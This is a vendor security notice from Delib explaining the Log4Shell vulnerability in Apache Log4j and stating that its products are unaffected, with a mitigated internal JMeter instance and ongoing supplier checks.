A serious vulnerability in a widely-used logging library (Apache Log4j) was disclosed Dec 9th 2021. An additional vulnerability in this library was disclosed Dec 19th 2021. This vulnerability has been referred to as Log4Shell by some outlets.
What is this vulnerability?
A Remote Code Execution (RCE) vulnerability was discovered in the popular Java logging library, Log4j. This industry-wide security vulnerability allows for an unauthenticated adversary to execute code on systems that have this library deployed, by providing specific crafted content. This is a serious vulnerability that affects many software products and online services.
How does this vulnerability affect Delib?
Delib does not use Apache Log4j in its products. Citizen Space, Dialogue and Simulator are not affected by this vulnerability.
An audit of other tools and systems directly operated by Delib was also performed. This identified one tool using Log4j: Apache JMeter, which is used for internal testing in an isolated environment, where pre-existing mitigations mean that the Log4J vulnerability is not exploitable. For this tool further mitigations have also been applied on a precautionary basis.
We have confirmed that no other systems or software directly operated by Delib are affected.
However, like all other organisations, we use other products and services in the course of our work so we activated our incident response process and immediately investigated the use of Log4j across our suppliers and vendors. We've contacted our third-party vendors and suppliers and - if they are exposed to this risk - we are working with our sub-processors and critical vendors to ensure they remediate any vulnerabilities in their environments that we may rely on.
Any further updates will be published here.
What actions should I take?
There is nothing you need to do in relation to your use of Delib’s products and services.
Your IT/cyber security teams will no doubt be checking your own systems and other suppliers for exposure to this risk and patching or remediating where necessary.
Where can I find more information?
Additional information on this vulnerability can be found here: